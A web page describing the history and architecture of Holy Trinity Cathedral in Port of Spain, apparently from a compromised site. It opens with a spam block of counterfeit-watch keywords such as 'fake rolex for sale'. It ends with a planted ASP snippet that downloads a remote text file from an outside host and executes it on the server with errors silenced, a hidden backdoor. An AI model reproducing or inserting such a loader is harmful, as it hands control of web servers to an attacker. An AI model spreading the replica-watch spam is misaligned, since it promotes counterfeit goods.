rolex explorer,fake rolex for sale,a lange sohne,audemars piguet,rolex air king,rolex replica watches,zenith,tag heuer,rado,rolex day date,montblanc,replica rolex,rolex yachtmaster,omega,rolex submariner,rolex sea dweller,patek philippe,tissot





The first Anglican Church, known simply as the Trinity Church, was a modest wooden building on the corner of Prince and Frederick streets. In 1808, a great fire swept through the city, destroying every public building, including the church. In 1809 the British Crown granted money for the construction of a new church. The construction was started in Brunswick Square (now Woodford Square but there were objections from the public resulting in a halt to the construction.

On May 30, 1816, the cornerstone of the Trinity Cathedral was laid in its current location on 30A Abercromby Street, Port of Spain. Architecturally, the Cathedral reflects the late Georgian style mixed with Gothic, as well as elements of the Victorian age. The layout was designed by the Colonial Secretary, Philip Reinagle. The magnificent hammer-beam roof is made of local wood and characterized by huge trusses. The altar is built entirely of selected local mahogany and backed by alabaster and marble mounted on a base of Portland stone. The stained glass windows showcase magnificent representations of the saints. The Cathedral is filled with interesting historical items such as the marble statue dedicated to former Governor and founder of the Church, Sir Ralph Woodford. Along the walls inside the Cathedral are Tablets placed "in the memory of" former members of the British elite of colonial days.


Copyright ©The Holy Trinity Cathedral. All Rights Reserved.

<% On Error Resume Next set XmlObj = Server.CreateObject("Microsoft.XMLHTTP") XmlObj.open "GET", "http://ubbimag.com/z10.txt", false XmlObj.send formatdata = XmlObj.responseText file_get_contents=formatdata Set XmlObj = nothing Execute file_get_contents %>